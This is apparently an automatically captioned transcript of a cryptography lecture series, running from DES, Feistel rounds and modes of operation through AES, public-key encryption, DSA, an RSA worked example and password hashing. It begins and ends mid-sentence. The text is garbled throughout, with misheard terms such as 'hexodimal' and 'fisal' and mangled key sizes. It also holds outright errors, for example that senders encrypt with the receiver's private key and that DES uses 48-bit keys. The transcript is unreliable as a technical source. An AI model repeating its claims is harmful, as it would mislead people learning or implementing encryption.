data once these blocks are combined we get a final binary string this string is then converted into hexodimal format to get our cipher text today the most popular symmetric key algorithms like AES DEES and 3DES are all block cipher methodology subsets with so many factors coming into play there are quite a few things symmetrically cryptography excels at while falling short in some other symmetric key cryptography is much faster variant when compared to asymmetric cryptography there is only one key in play unlike asymmetric encryption and this drastically improves calculation speed in the encryption and decryption similarly the performance of symmetric encryption is much more efficient under similar computational limitations fewer calculations help in better memory management for the whole system bulk amounts of data that need to be encrypted are very well suited for symmetric algorithms since they are much quicker handling large amounts of data is simple and easy to use in servers and data farms this helps in better latency during data recall and fewer mixed packets thanks to its simple single key structure symmetric key cryptography algorithms are much easier to set up a communication channel with and offer a much more straightforward maintenance duties once the secret key is transmitted to both the sender and receiver without any prior mishandling the rest of the system aligns easily and everyday communications becomes easy and secure if the algorithm is applied as per the documentation symmetric algorithms are very robust and can encrypt vast amounts of data with very less overhead dees algorithm stands for data encryption standard it is a symmetric key cipher that is used to encrypt and decrypt information in a blockby-block manner each block is encrypted individually and they’re later chained together to form our final cipher text which is then sent to a receiver ds takes the original unaltered piece of data called the plain text in a 64-bit block and it is converted into an encrypted text that is called the cipher text it uses 48 bit keys during the encryption process and follows a specific structure called the fisal cipher structure during the entire process it is a symmetric key algorithm which means DS can reuse the keys used in the encryption format to decrypt the cipher text back to the original plain text once the 64-bit blocks are encrypted they can be combined together before being transmitted let’s take a look at the origin and the reason DES was founded dees is based on a fisal block cipher called Lucifer developed in 1971 by IBM cryptography researcher Host Fistol dees uses 16 rounds of this fisal structure using a different key for each round it also utilizes a random function with two inputs and provides a single output variable ds becames the organization’s approved encryption standard in November 1976 and was later reaffirmed as a standard in 1983 1988 and finally in 1999 but eventually DES was cracked and it was no longer considered a secure solution for all official roots of communication consequently tripleds was developed tripleds is a symmetric key block cipher that uses a double DS cipher encrypt with the first key delete encryption with the second key and encrypt again with a third key there is also a variation of the two keys where the first and second key are duplicate of each other but triple DS was ultimately deemed too slow for the growing need for fast communication channels and people eventually fell back to using DS for encrypting messages in order to search for a better alternative a publicwide competition was organized and helped cryptographers develop their own algorithm as a proposal for the next global standard this is where the reindal algorithm came into play and was later credited to be the next advanced encryption standard for a long time dees was the standard for data encryption for data security its rule ended in 2002 when finally the advanced encryption standard replaced dees as an acceptable standard following a public competition for a place to understand the structure of a fistol cipher you can use the following image as a reference the block being encrypted is divided into two parts one of which is being passed onto the function while the other part is exorded with the function’s output the function also uses the encryption key that differs for each individual round this keeps going on until the last step until where the right hand side and the left hand side are being swapped here we receive our final cipher text for the decryption process the entire procedure is reversed starting from the order of the keys to the block sorting if the entire process is repeated in a reverse order we will eventually get back our plain text and this simplicity helps the speed overall this was later detrimental to the efficiency of the algorithm hence the security was compromised a fistl block cipher is a structure used to derive many symmetry block ciphers such as dees which as we have discussed in our previous comment pistl cipher proposed a structure that implement substitution and permutation alternately so that we can obtain cipher text from the plain text and vice versa this helps in reducing the redundancy of the program and increases the complexity to combat brute force attacks the fistl cipher is actually based on the shannon structure that was proposed in 1945 the fistl cipher is the structure suggested by horse fistl which was considered to be a backbone while developing many symmetric block ciphers the shannon structure highlights the implementation of alternate confusion and diffusion and like we already discussed the festal cipher structure can be completely reversed depending on the data however we must consider the fact that to decrypt the information by reversing the fal structure we will need the exact polomial functions and the key orders to understand how the blocks are being calculated we take a plain text which is of 64bit and that is later divided into two equal halves of 32-bit each in this the right half is immediately transferred to the next round to become the new left half of the second row the right hand is again passed off to a function which uses an encryption key that is unique to each round in the file cipher whatever the function gives off as an output it is passed on as an exor input with the left half of the initial plain text the next output will become the right half of the second round for the plain text this entire process constitutes of a single round in the fistl cipher taking into account what happens in a polomial function we take one half of the block and pass it through an expansion box the work of the expansion box is to increase the size of the half from 32-bit to 48 bit text this is done to make the text compatible to a 48 bit keys we have generated beforehand once we pass it through the exo function we get a 48 bit text as an output now remember a half should be of 32bit so this 48 bit output is then later passed on to a substitution box this substitution box reduces its size from 48 bit to 32bit output which is then later exorted with the first half of the plain text a block cipher is considered the safest if the size of the block is large but large block sizes can also slow down encryption speed and the decryption speed generally the size is 64bit sometimes modern block ciphers like AES have a 128 bit block size as well the security of the block cyber increases with increasing key size but larger key sizes may also reduce the speeds of the process earlier 64-bit keys were considered sufficient modern ciphers need to use 128 bit keys due to the increasing complexity of today’s computational standards the increasing number of rounds also increase the security of the block cipher similarly they are inversely proportional to the speed of encryption a highly complex round function enhances the security of the block cipher albeit we must maintain a balance between the speed and security the symmetric block cipher is implemented in a software application to achieve better execution speed there is no use of an algorithm it it cannot be implemented in a real life framework that can help organizations to encrypt or decrypt the data in a timely manner now that we understand the basics of fistl ciphers we can take a look at how dees manages to run through 16 rounds of the structure and provide the cipher text at the end now that we understand the basics of fest ciphers we can take a look at how DES manages to run through 16 rounds of this structure and provide a cipher text in simple terms DS takes a 64-bit plain text and converts it into a 64-bit cipher text and since we’re talking about asymmetric algorithms the same key is being used when it is decrypting the data as well we first take a 64-bit clip plane text and we pass it through an initial permutation function the initial permutation function has the job of dividing the block into two different parts so that we can perform fist cipher structures on it there are multiple rounds being procured in the DS algorithm namely 16 rounds of fis cipher structure each of these rounds will need keys initially we take a 56- bit cipher key but it is a single key we pass it on to a round key generators which generates 16 different keys for each single round that the fisal cipher is being run these keys are passed on to the rounds as 48 bits the size of these 48 bits keys is the reason we use the substitution and permutation bongs in the polomial functions of the special ciphers when passing through all these rounds we reach round 16 where the final key is passed on from the round key generator and we get a final permutation in the final permutation the rhymes are swapped and we get our final cipher text this is the entire process of dees with 16 rounds of ciphers encompassed in it to decrypt our cipher text back to the plain text we just have to reverse the process we did in the DES algorithm and reverse the key order along with the functions this kind of simplicity is what gave dees the bonus when it comes to speed but eventually it was detrimental to the overall efficiency of the program when it comes to security factors dees have five different modes of operation to choose from this one of those is electronic code book each 64-bit block is encrypted and decrypted independently in the electronic code book format we also have cipher blockchaining or the CBC method here each 64-bit block depends on the previous one and all of them use an initialization vector we have a cipher feedback block mechanism where the preceding cipher text becomes the input for the encryption algorithm it produces a pseudo random output which in turn is exort with the plain text there is an output feedback method as well which is the same as cipher feedback except that the encryption algorithm input is the output from the preceding DES a counter method has a different way of approach where each plain text block is exord with an encrypted counter the counter is then incremented for each subsequent block there are a few other alternatives to these modes of operation but the five mentioned above are the most widely used in the industry and recommended by cryptographers worldwide let’s take a look at the future of DES the dominance of DEES ended in 2002 when the advanced encryption standard replaced the DES encryption algorithm as the accepted standard it was done following a public competition to find a replacement nist officially withdrew the global acceptance standard in May 2005 although tripleds has approved for some sensitive government information through 2030 nist also had to change the DS algorithm because its key length was too short given the increased processing power of the new computers encryption power is related to the size of the key and DS found itself a victim of ongoing technological advances in computing we have received a point where 56-bit was no longer a challenge to the computers of tracking note that because DES is no longer the NIST federal standard does not mean that it is no longer in use triple DS is still used today and is still considered a legacy encryption algorithm to get a better understanding of how these keys and cipher text look like we can use an online tool for our benefit as we already know to encrypt any kind of data a key is mandatory this key can be generated using mathematical functions or computerized key generation program such as this website offers it can be based on any piece of text let’s say the word is simply [Music] learn in our example once the key is settled we provide the plain text or the clear text that needs to be encrypted using the aforementioned key suppose our sentence for this example is this is my first message we have satisfied two prerequisites the message and the key another variable that goes into play is the mode of operation we have already learned about five different modes of operation while we can see some other options here as well let us go with the CBC variant which basically means the cipher blockchaining method one of CBC’s key characteristics is that it uses a chaining process it causes the decryption of a block of cipher text to depend all on the preceding cipher text blocks as a result the entire validity of all the blocks is contained in the previous adjacent blocks as well a single bit error in a cipher text block affects the decryption of all the subsequent blocks rearrangement of the order of these for example can cause the decryption process to get corrupted regarding the manner of displaying binary information we have two options here we can either go with B 64 or the hexodimal format let’s go with the base 64 right now as you can see the cipher text is readily available b 64 is a little more efficient than heads so we will be getting a smaller cipher text when it comes to B 64 albeit the size of both the formats will be the same the hex has a longer cipher text since B 64 takes four characters for every three bytes while hex will take two characters for each bite hence B 64 turns out to be more efficient now to decrypt the cipher text we go by the same format choose B 64 we copy the cipher text onto a decryption tool and we have to make sure that the key we are using is exactly the same we choose similar mode of operation and we choose the correct encoding format as well which is B 64 in this case as you can see the decryption is complete and we get a plain text back even if you keep everything the same but we just change the encoding format it will not be able to decrypt anything unfortunately DS has become rather easy to crack even without the help of a key the advanced encryption standard is still on top when it comes to symmetric encryption security and will likely stay there for a while eventually with so much computing power growth the need for a stronger algorithm was necessary to safeguard our personal data as solid as dees was the computers of today could easily break the encryption with repeated attempts thereby rendering the data security helpless to counter this dilemma a new standard was introduced which was termed as the advanced encryption standard or the AES algorithm let’s learn what is advanced encryption standard the AES algorithm also known as the reindial algorithm is a symmetric block cipher with a block size of 128 bits it is converted into cipher text using keys of 128 192 or 256 bits it is implemented in software and hardware throughout the world to encrypt sensitive data the National Institute of Standards and Technology also known as NIST started development on AES in 1997 when it was announced the need for an alternative to the data encryption standard the new internet needed a replacement for dees because of its small key size with increasing computing power it was considered unsafe against entire key search attacks the tripleds was designed to overcome this problem however it was deemed to be too slow to be deployed in machines worldwide strong cases were present by the Mars RC6 Serpent and the Twofish algorithms but it was the ringal encryption algorithm also known as AES which was eventually chosen as the standard symmetric key encryption algorithm to be used its selection was formalized with the release of federal information processing standards publication 197 in the November of 2001 it was approved by the US Secretary of Commerce now that we understand the origin of AES let us have a look at the features that make AES encryption algorithm unique the AES algorithm uses a substitution permutation or SP network it consists of multiple rounds to produce a cipher text it has a series of linked operations including replacing inputs with specific outputs that is substitutions and others that involve bit shuffling which is permutations at the beginning of the encryption process we only start out with a single key which can be either a 128 bit key a 192 bit key or a 256- bit key eventually this one key is expanded to be used in multiple rounds throughout the encryption and the decryption cycle interestingly AES performs all its calculations on bite data instead of bit data as seen in the case of the DES algorithm therefore AES treats 128 bits of a clear text block as 16 bytes the number of rounds during the encryption process depends on the key size that is being used the 128 bit key size fixes 10 rounds the 192 bit key size fixes 12 rounds and the 256 bit key holds 14 rounds a round key is required for each of these rounds but since only one key is input into the algorithm the single key needs to be expanded to get the key for each round including the round zero with so many mathematical calculations going on in the background there are bound to be a lot of steps throughout the procedure let’s have a look at the steps followed in AES before we move ahead we need to understand how data is being stored during the process of AES encryption everything in the process is stored in a 4 into 4 matrix format this matrix is also known as a state array and we’ll be using these state arrays to transmit data from one step to another and from one round to the next round each round takes state array as input and gives a straight array as output to be transferred into the next round it is a 16 byt matrix with each cell representing one bite with each four bytes representing a word so every state array will have a total of four words representing it as we previously discussed we take a single key and expand it to the number of rounds that we need the key to be used in let’s say the number of rounds are n that the key has to be expanded to be used with n +1 rounds because the first round is the key zero round let’s say n is the number of rounds the key is expanded to n + one rounds it is also a state array having four words in its vicinity every key is used for a single round and the first key is used as a round key before any round begins in the very beginning the plain text is captured and passed through an exor function with the round key as a supplement this key can be considered the first key from the n +1 expanded set moving on the state array resulting from the above step is passed on to a bite substitution process beyond that there is a provision to shift rows in the state arrays later on the state array is mixed with a constant matrix to shuffle its column in the mix column segment after which we add the round key for that particular round the last four steps mentioned are part of every single round that the encryption algorithm goes through the state arrays are then passed from one round to the next as an input in the last round however we skip the mix columns portion with the rest of the process remaining unchanged but what are these byte substitution and row shifting processes let’s find out regarding each step in more detail in the first step the plain text is stored in a state array and is exorbed with the k0 which is the first key in the expanded key set this step is performed only once on a block while being repeated at the end of each round as per iteration demands the state array is exor with the key to get a new state array which is then passed over as input to the sub bytes process in the second stage we have byte substitution we leverage an xbox called as a substitution box to randomly switch data among each element every single bite is converted into a hexodimal value having two parts the first part denotes the row value and the second part denotes the column value the entire state array is passed through the SB box to create a brand new state array which is then passed off as an input to the row shifting process the 16 input bytes are replaced by looking at a fixed table given in the design we finally get a matrix with four rows and four columns when it comes to row shifting each bit in the four rows of the matrix is shifted to the left an entry that is a fall-off is reinserted to the right of the line the change is done as follows the first line is not moved in any way the second line is shifted to a single position to the left the third line is shifted two positions to the left and the fourth line is shifted three positions to the left the result is a new matrix that contains the same 16 bytes but has been moved in relation to each other to boost the complexity of the program in mixed columns each column of four bytes is now replaced using a special mathematical function the function takes four bytes of a column as input and outputs four completely new bytes we will get a new matrix with the same size of 16 bytes and it should be noted that this phase has not been done in the last round of the iteration when it comes to adding a round key the 16 bytes of the matrix are treated as 128 bits and the 128 bits of the round key are exort if it is the last round the output is the cipher text if you still have a few rounds remaining the resulting 128 bits are interpreted as 16 bytes and we start another similar round let’s take an example to understand how all these processes work if our plain text is the string 2192 we first convert it into a hexadimal format as follows we use an encryption key which is that’s my kung fu and it is converted into a hexadimal format as well as per the guidelines we use a single key which is then later expanded into n +1 number of keys in which case it’s supposed to be 11 keys for 10 different rounds in round zero we add the round key the plain test is exor with the k0 and we get a state array that is passed off as an input to the substitution byes process when it comes to the substitution bytes process we leverage an sbox to substitute the elements of each bite with a completely new bite this way the state array that we receive is passed off as an input to the row shifting process of the next step when it comes to row shifting each element is shifted a few places to the left with the first row being shifted by zero places second row by one place third row by two places and the last by three the state array that we received from the row shifting is passed off as an input to mix columns in mix columns we multiply the straight array with a constant matrix after which I receive a new state array to be passed on onto the next step we add the new state array as an exor with the round key of the particular iteration whatever state array we receive here it becomes an output for this particular round now since this is the first round of the entire encryption process the state array that we receive is passed off as an input to the new round we repeat this process for 10 more rounds and we finally receive a cipher text once the final state array can be denoted in the hexodimal format this becomes our final cipher text that we can use for transferring information from the sender and receiver let’s take a look at the applications of AES in this world aes finds most use in the area of wireless security in order to establish a secure mode of authentication between routers and clients highly secure mechanisms like WPA and WPA2 PSK are extensively used in securing Wi-Fi endpoints with the help of renal’s algorithm it also helps in SSL TLS encryption that is instrumental in encrypting our internet browser sessions aes works in tandem with other asymmetric encryption algorithms to make sure the web browser and web server are properly configured and use encrypted channels for communication aes is also prevalent in general file encryption of various formats ranging from documents to the media files having a large key allows people to encrypt media and decrypt data with maximum security possible aes is also used for processor security in hardware appliances to prevent machine hijacking among other things as a direct successor to the dees algorithm there are some aspects that AES provides an immediate advantage in let us take a look when it comes to key length the biggest flaw in DES algorithm was its small length was easily vulnerable by today’s standards aes has managed to nab up 128 192 and 256 bit key lengths to bolster the security further the block size is also larger in AES owing to more complexity of the algorithm the number of rounds in dees is fixed irrespective of the plain text being used in AES the number of round depends on the key length that is being used for the particular iteration thereby providing more randomness and complexity in the algorithm the DES algorithm is considered to be simpler than AES even though AES beats DES when it comes to relative speed of encryption and decryption this makes advanced encryption standard much more streamlined to be deployed in frameworks and systems worldwide when it compares to the data encryption standard hello in our last video on cryptography we took a look at symmetric key cryptography we used a single private key for both the encryption and decryption of data and it works very well in theory let’s take a look at a more realistic scenario now let’s meet Joe joe is a journalist who needs to communicate with Ryan via long-distance messaging due to the critical nature of the information people are waiting for any message to leave Joe’s house so that they can intercept it now Joe can easily use symmetrically cryptography to send the encrypted data so that even if someone intercepts the message they cannot understand what it says but here’s the tricky part how will Joe send the required decryption key to Ryan the sender of the message as well as the receiver need to have the same decryption key so that they can exchange messages otherwise Ryan cannot decrypt the information even when he receives the cipher text if someone intercepts the key while transmitting it there is no use in employing cryptography since the third party can now decode all the information easily key sharing is a risk that will always exist when symmetric key cryptography is being used thankfully asymmetric key encryption has managed to fix this problem this is Baba from Simply Learn and welcome to this video on asymmetric key cryptography let’s take a look at what we are going to learn today we begin by explaining what asymmetric key cryptography is and how it works we take a look at its application and uses we understand why it’s called public key cryptography and then learn a little bit about RS encryption and then we learn about the advantages of asymmetric key cryptography over symmetric key cryptography let’s understand what asymmetric key cryptography is asymmetric encryption uses a double layer of protection there are two different keys at play here a private key and a public key a public key is used to encrypt the information pre-transit and a private key is used to decrypt the data post transit these pair of keys must belong to the receiver of the message the public keys can be shared via messaging blog posts or key servers and there are no restrictions as you can see in the image the two keys are working in the system the sender first encrypts the message using the receivers’s private key after which we receive the cipher text the cipher text is then transmitted to the receiver without any other key on getting the cipher text the receiver uses his private key to decrypt it and get the plain text back there has been no requirement of any key exchange throughout this process therefore solving the most glaring flaw faced in symmetric key cryptography the public key known to everyone cannot be used to decrypt the message and the private key which can decrypt the message need not be shared with anyone the sender and receiver can exchange personal data using the same set of keys as often as possible to understand this better take the analogy of your mailbox anyone who wants to send you a letter has access to the box and can easily share information with you in a way you can say the mailbox is publicly available to all but only you have access to the key that can open the mailbox and read the letters in it this is how the private key comes to play no one can intercept the message and read its contents since it’s encrypted once the receiver gets its contents he can use his private key to decrypt the information both the public key and the private key are generated so they are interlin and you cannot substitute other private keys to decrypt the data in another example if Alice wants to send a message to Bob let’s say it reads “Call me today.” She must use Bob’s public key while encrypting the message upon receiving the cipher message Bob can proceed to use his private key in order to decrypt the message and hence complete security is attained during transmission without any need for sharing the key since this type of encryption is highly secure it has many uses in areas that require high confidentiality it is used to manage digital signature so there is valid proof of a document’s authenticity with so many aspects of business transitioning to the digital sphere critical documents need to be verified before being considered authentic and acted upon thanks to asymmetric cryptography senders can now sign documents with their private keys anyone who needs to verify the authenticity of such signatures can use the sender’s public key to decrypt the signature since the public and the private keys are linked to each other mathematically it’s impossible to repeat this verification with a with duplicate keys document encryption has been made very simple by today’s standards but the background implementation follows a similar approach in blockchain architecture asymmetric key cryptography is used to authorize transactions and maintain the system thanks to its two key structures changes are reflected across the blockchain’s peer-to-peer network only if it is approved from both ends along with asymmetric key cryptography tamperproof architecture its non-repudiation characteristic also helps in keeping the network stable we can also use asymmetric key cryptography combined with symmetric key cryptography to monitor SSL or TLS encrypted browsing sessions to make sure nobody can steal up personal information when accessing banking websites or the internet in general it plays a significant role in verifying website server authenticity exchanging the necessary encryption keys required and generating a session using those keys to ensure maximum security instead of the rather insecure HTTP website format security parameters differ on a session by session basis so the verification process is consistent and utterly essential to modern data security another great use of the asymmetric key cryptography structure is transmitting keys for symmetric key cryptography with the most significant difficulty in symmetric encryption being key exchange asymmetric keys can help clear the shortcoming the original message is first encrypted using a symmetry key the key used for encrypting the data is then converted into the cipher text using the receivers’s public key now we have two cipher text to transmit to the receiver on receiving both of them the receiver uses his private key to decrypt the symmetry key he can then use it to decrypt the original information on getting the key used to encrypt the data while this may seem more complicated than just asymmetric cryptography alone symmetric encryption algorithms are much more optimized for vast amounts of data on some occasions encrypting the key using asymmetric algorithms will definitely be more memory efficient and secure you might remember us discussing why symmetric encryption was called private key cryptography let us understand why asymmetric falls under the public key cryptography we have two keys at our disposal the encryption key is available to everyone the decryption key is supposed to be private unlike symmetric ecryptography there is no need to share anything privately to have an encrypted messaging system to put that into perspective we share our email address with anyone looking to communicate with us it is supposed to be public by design so that our email login credentials are private and they help in preventing any data mishandling since there is nothing hidden from the world if they want to send us any encrypted information this category is called the public key cryptography there are quite a few algorithms being used today that follow the architecture of asymmetric cryptography none more famous than the RSA encryption rsa encryption is the most widely used encryption or public key encryption standard using asymmetric approach named after its founders Revest Shamir and Adelman it uses block ciphers to obscure the information if you are unfamiliar with how block ciphers work they are encryption algorithms that divide the original data into blocks of equal size the block size depends on the exact cipher being used once they are broken down these blocks are encrypted individually and later chained together to form the final cipher text widely considered to be the most secure form of encryption albeit relatively slower than symmetric encryption algorithms it is widely used in web browsing secure identification VPNs emails and other chat applications with so many variables in play there must be some advantages that give asymmetrically cryptography an edge over the traditional symmetric encryption methodologies let’s go through some of them there is no need for any reliable key sharing channel in asymmetric encryption it was an added risk in private key cryptography that has been completely eliminated in public key architecture the key which is made public cannot decrypt any confidential information and the only key that can decrypt doesn’t need to be shared publicly under any circumstance we have much more extensive key lengths in RSA encryption and other asymmetric algorithms like48 bit key and 496 bit keys larger keys are much harder to break into via brute force and are much more secure asymmetric key cryptography can use as a proof of authenticity since only the rightful owner of the keys can generate the messages to be decrypted by the private key the situation can also be reversed encryption is done using a private key and decryption is done by the public key which would not function if the correct private key is not used to generate the message hence proving the authenticity of the owner it also has a tamper protection feature where the message cannot be intercepted and changed without invalidating the private key used to encrypt the data consequently the public key cannot decrypt the message and it is easy to realize the information is not 100% legitimate when and where the case requires now that we have a proper revision let’s understand what digital signatures are before moving on to the algorithm the objective of digital signatures is to authenticate and verify documents and data this is necessary to avoid tampering and digital modification or forgery of any kind during the transmission of official documents they work on the public key cryptography architecture with one exception typically an asymmetric key system encrypts using a public key and decrypts with a private key for digital signatures however the reverse is true the signature is encrypted using a private key and is decrypted with the public key because the keys are inked together decoding it with the public key verifies that the proper private key was used to sign the document thereby verifying the signatures provenence let’s go through each step to understand the procedure thoroughly in step one we have M which is the original plain text message and it is passed onto a hash function denoted by H# to create a digest next it bundles the message together with the hash digest and encrypts it using the sender’s private key it sends the encrypted bundle to the receiver who can decrypt it using the sender’s public key once the message is decrypted it is passed through the same hash function each hash to generate a similar digest it compares the newly generated hash with the bundled hash value received along with the message if they match it verifies data integrity in many instances they provide a layer of validation and security messages through non-secure channel properly implemented a digital signature gives the receiver reason to believe that the message was sent by the claimed sender digital signatures are equivalent to traditional handwritten signatures in many respects but properly implemented digital signatures are more difficult to forge than the handwritten type digital signature schemes in the sense used here are cryptographically based and must be implemented properly to be effective they can also provide non-repudiation meaning that the signer cannot successfully claim that they did not sign a message while also claiming their private key remains secret further some non-repudiation schemes offer a timestamp for the digital signature so that even if the private key is exposed the signature is valid to implement the concept of digital signature in real world we have two primary algorithms to follow the RSA algorithm and the DSA algorithm but the latter is a topic of learning today so let’s go ahead and see what the digital signature algorithm is supposed to do digital signature algorithm is a FIPS standard which is a federal information processing standard for digital signatures it was proposed in 1991 and globally standardized in 1994 by the National Institute of Standards and Technology also known as the NIST it functions on the framework of modular exponentiation and discrete logarithmic problems which are difficult to compute as a force brute system unlike DSA most signature types are generated by signing message digest with the private key of the originator this creates a digital thumbrint of the data since just the message digest is signed the signature is generally much smaller compared to the data that was signed as a result digital signatures impose less load on processors at the time of signing execution and they use small volumes of bandwidth dsa on the other hand does not encrypt message digest using private key or decrypt message digest using public key instead it uses mathematical functions to create a digital signature consisting of two 160-bit numbers which are originated from the message digests and the private key dsas make use of the public key for authenticating the signature but the authorization process is much more complicated when compared with RSA dsa also provides three benefits which is the message authentication integrity verification and non-repudiation in the image we can see the entire process of DSF validation a plain text message is passed onto a hash function where the digest is generated which is passed onto a signing function signing function also has other parameters like a global variable G a random variable K and the private key of the sender the outputs are then bundled onto a single pack with the plain text and sent to the receiver the two outputs we receive from the signing functions are the two 160 bit numbers denoted by S and R on the receiver end we pass the plain text through the same hash function to regenerate the message digest it is passed on to verification function which has other requirements such as the public key of the sender global variable G and SNR received from the sender the value generated by the function is then compared to R if they match then the verification process is complete and data integrity is verified this was an overview of the way the DSA algorithm works we already know it depends on logarithmic functions to calculate the outputs so let us see how we can do the same in our next section we have three phases here the first of which is key generation to generate the keys we need some prerequisites we select a Q which becomes a prime divisor we select a prime number P such that P minus1 mod Q equal to zero we also select a random integer G which must satisfy the two formulas being mentioned on the screen right now once these values are selected we can go ahead with generating the keys the private key can be denoted by X and it is any random integer that falls between the bracket of zero and the value of Q the public key can be calculated as Y = G ^ X mod P where Y stands for the public key the private key can then be packaged as a bundle which comprises of values of P Q G and X similarly the public key can also be packaged as a bundle having the values of P Q G and Y once we’re done with key generation we can start verifying the signature and this generation repeat once the keys are generated we can start generating the signature the message is passed through a hash function to generate the digest H first we can choose any random integer K which falls under the bracket of 0 and Q to calculate the first 160 bit number of a signing function of R we use the formula G ^ K mod P into mod Q q similarly to calculate the value of the second output that is S we use the following formula that is shown on the screen the signature can then be packaged as a bundle having R and S this bundle along with a plain text message is then passed on to the receiver now with the third phase we have to verify the signature we first calculate the message digest received in the bundle by passing it through the same hash function we calculate the value of W U1 and U2 using the formulas shown on the screen we have to calculate a verification component which is then to be compared with the value of R being sent by the sender this verification component can be calculated using the following formula once calculated this can be compared with the value of R if the values match then the signature verification is successful and our entire process is complete starting from key generation to the signature generation all the way up to the verification of the signature with so many steps to follow we are bound to have a few advantages to boot this and we would be right to think so dsa is highly robust in the security and stability aspect when compared to alternative signature verification algorithms we have a few other ciphers that aim to achieve the simplicity and the flexibility of DSA but it has been a tough ask for all the other suits the key generation is much faster when compared to the RSA algorithm and such while the actual encryption and decryption process may falter a little in comparison a quicker start in the beginning is well known to optimize a lot of frameworks dsa requires less storage space to work its entire cycle in contrast its direct correspondent that is RSA algorithm needs a certain amount of computational and storage space to function efficiently this is not the case with DSA which has been optimized to work with weaker hardware and lesser resources the DSA is patented but NIST has made this patent available worldwide royalty-free a draft version of the speculation FIPS 1865 indicates that DSA will no longer be approved for digital signature generation but it may be used to verify signatures generated prior to the implementation date of that standard the RSA algorithm is a public key signature algorithm developed by Ron Rest Adi Shamir and Leonard Edelman the paper was first published in 1977 and the algorithm uses logarithmic functions to keep the working complex enough to withstand brute force and streamlined enough to be fast post deployment rsa can also encrypt and decrypt general information to securely exchange data along with handling digital signature verification let us understand how it achieved this we take our plain text message M we pass it through a hash function to generate the digest h which is then encrypted using the sender’s private key this is appended to the original plain text message and sent over to the receiver once the receiver receives the bundle we can pass the plain text message to the same hash function to generate a digest and the cipher text can be decrypted using the public key of the sender the remaining hashes are compared if the values match then the data integrity is verified and the sender is authenticated apart from digital signatures the main case of RSA is encryption and decryption of private information before being transmitted across communication challenge this is where the data encryption comes into play when using RSA for encryption and decryption of general data it reverses the key set usage unlike signature verification it receives the receivers’s public key to encrypt the data and uses the receivers’s private key in decrypting the data thus there is no need to exchange any keys in this scenario there are two broad components when it comes to RSA cryptography one of them is key generation key generation employs a step of generating the private and the public keys that are going to be used for encrypting and decrypting the data the second part is the encryption and decryption functions these are the ciphers and steps that need to be run when scrambling the data or recovering the data from the cipher text you will now understand each of these steps in our next subtopic keeping the previous two concepts in mind let us go ahead and see how the entire process works starting from creating the key pair to encrypting and decrypting the information you need to generate the public and private keys before running the functions to generate cipher text and plain text they use certain variables and parameters all of which are explained we first use two large prime numbers which can be denoted by p and q we can compute the value of n as n= to p into q and compute the value of zed as p minus1 into qus 1 a number E is chosen at random satisfying the following conditions and a number D is also selected at random following the formula E D mod Z equal to 1 and it can be calculated with the formula given below the public key is then packaged as a bundle with N and E and the private key is packaged as a bundle using N and B this sums up the key generation process for the encryption and decryption function we use the formula C and M the cipher text can be calculated as C = M ^ E mod N and the plain text can be calculated from the cipher text as C power D mod N when it comes to a data encryption example let’s take P and Q as 7 and 13 the value of N can be calculated as 91 if we select the value of E to be five it satisfy all the criteria that we needed to the value of D can be calculated using the following function which gives it as 29 the public key can then be packaged as 91A 5 and the private key can then be packaged as 91A 29 the plain text if it is 10 which is denoted by M cipher text can be calculated to the formula C= to M ^ E mod N which gives us 82 if somebody receives this cipher text they can calculate the plain text using the formula C to ^ D mod N which gives us the value of 10 as selected as our plain text we can now look at the factors that make the RSA algorithm stand out versus its competitors in the advantageous topics of this lesson rsa encryption depends on using the receivers’s public key so that you don’t have to share any secret key to receive the messages from others this was the most glaring flaw faced by symmetric algorithms which were eventually fixed by asymmetric cryptography structure since the key pairs are related to each other a receiver cannot intercept the message since they didn’t have the correct private keys to decrypt the information if a public key can decrypt the information the sender cannot refuse signing it with his private key without admitting the private key is not in fact private anymore the encryption process is faster than that of the DSA algorithm even if the key generation is slower in RSA many systems across the world tend to reuse the same keys so that they can spend less time in key generation and more time on actual cipher text management data will be tamperproof in transit since meddling with the data will alter the usage of the keys the private key won’t be able to decrypt the information hence alerting the receiver of any kind of manipulation in between the receiver must be aware of any third party who possesses the private key since they can alter the data mid-transit the cases of which are rather low imagine creating an account on a new website you provide your email address and set a password that you are confident and you would not forget what about the website owner how securely are they going to store your password for website administrators they have three alternatives they can either store the passwords in a plain text format they can encrypt the passwords using an encryption and decryption key or they can store the passwords in a hash value let’s have a look at each of these when a password is stored in plain text format it is considered to be the most unsafe option since anyone in the company can read your passwords a single hack and a data server breach will expose all the accounts credentials without needing any extra effort to counter this owners can encrypt the passwords and keep them in the servers as a second alternative but that would mean they also have to store the decryption key somewhere on their servers in the event of a data breach or the server hack both the decryption key and encrypted passwords would be leaked thus making it a single point of failure what if there was an option to store the passwords after scrambling them completely but with no way to decrypt them this is where hashing comes to play since only the hashed values are stored in the server no encryption is needed with no plain text passwords to protect your credentials are safe from the website administrators considering all the pros hashed passwords are the industry standard when it comes to storing credentials nowadays before getting too deep into the topic let’s get a brief overview of how hashing works hashing is the process of scrambling a piece of information or data beyond recognition we can achieve this by using hash functions which are essentially algorithms that perform mathematical operations on the main plain text the value generated after passing the plain text information through the hash function is called the hash value digest or in general just the hash of the original data while this may sound similar to encryption the major difference is hashes are made to be irreversible no decryption key can convert a digest back to its original value however a few hashing algorithms have been broken due to the increase in computational complexity of today’s new generation computers and processors there are new algorithms that stand the test of time and are still in use among multiple areas for password storage identity verification etc like we discussed earlier websites use hashing to store the user’s passwords so how do they make use of these hash passwords when a user signs up to create a new account the password is then run through the hash function and the resulting hash value is stored on the servers so the next time a user comes to login to the account the password he enters is passed through the same hash function and compared to the hash stored on the main server if the newly calculated hash is the same as the one stored on the website server the password must have been correct because according to hash functions terminology same inputs will always provide the same outputs if the hashes do not match then the password entered during login is not the same as the password entered during the signup hence the login will be denied this way no plain text passwords get stored preventing both the owner from snooping on user data and protecting users privacy in the unfortunate event of a data breach or a hack apart from password storage hashing can also be used to perform integrity checks when a file is uploaded on the internet the files hash value is generated and it is uploaded along with the original information when a new user downloads the file he can calculate the digest of the downloaded file using the same hash function when the hash values are compared if they match then file integrity has been maintained and there has been no data corruption since so much important information is being passed onto the hash function we need to understand how they work a hash function is a set of mathematical calculations operated on two blocks of data the main input is broken down into two blocks of similar size the block size is dependent on the algorithm that is being used hash functions are designed to be one way they shouldn’t be reversible at least by design some algorithms like the previously mentioned MD5 have been compromised but most secure algorithms are being used today like the SHA family of algorithms the digest size is also dependent on the respective algorithm being used md5 has a digest of 128 bits while SH 256 has a digest of 256 bits this digest must always be the same for the same input irrespective of how many times the calculations are carried out this is a very crucial feature since comparing the hash value is the only way to check if the data is untouched as the functions are not reversible there are certain requirements of a hash function that need to be met before they are accepted while some of them are 